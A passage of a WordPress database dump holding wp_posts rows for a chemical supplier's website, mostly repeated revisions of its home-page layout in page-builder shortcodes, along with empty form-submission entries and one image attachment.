id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 18:29:43', '2017-05-01 18:29:43', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4137, 2, '2017-05-01 18:34:32', '2017-05-01 18:34:32', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="30" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 18:34:32', '2017-05-01 18:34:32', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4138, 2, '2017-05-01 18:52:24', '2017-05-01 18:52:24', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="26" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 18:52:24', '2017-05-01 18:52:24', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4139, 0, '2017-05-01 23:34:49', '2017-05-01 23:34:49', '', '', '', 'publish', 'closed', 'closed', '', '4139', '', '', '2017-05-01 23:34:49', '2017-05-01 23:34:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4139/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4140, 0, '2017-05-02 01:53:09', '2017-05-02 01:53:09', '', '', '', 'publish', 'closed', 'closed', '', '4140', '', '', '2017-05-02 01:53:10', '2017-05-02 01:53:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4140/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4141, 0, '2017-05-02 14:23:35', '2017-05-02 14:23:35', '', '', '', 'publish', 'closed', 'closed', '', '4141', '', '', '2017-05-02 14:23:35', '2017-05-02 14:23:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4141/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4142, 2, '2017-05-02 15:28:25', '2017-05-02 15:28:25', '', '', '', 'publish', 'closed', 'closed', '', '4142', '', '', '2017-05-02 15:28:25', '2017-05-02 15:28:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/4142/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4143, 0, '2017-05-02 18:00:48', '2017-05-02 18:00:48', '', '', '', 'publish', 'closed', 'closed', '', '4143', '', '', '2017-05-02 18:00:48', '2017-05-02 18:00:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/4143/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4144, 2, '2017-05-02 19:18:59', '2017-05-02 19:18:59', '', 'wire-test', '', 'inherit', 'closed', 'closed', '', 'wire-test', '', '', '2017-05-02 19:18:59', '2017-05-02 19:18:59', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/wire-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4145, 2, '2017-05-02 19:19:46', '2017-05-02 19:19:46', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="26" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:19:46', '2017-05-02 19:19:46', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4146, 2, '2017-05-02 19:21:54', '2017-05-02 19:21:54', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="26" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:21:54', '2017-05-02 19:21:54', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4147, 2, '2017-05-02 19:23:26', '2017-05-02 19:23:26', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" 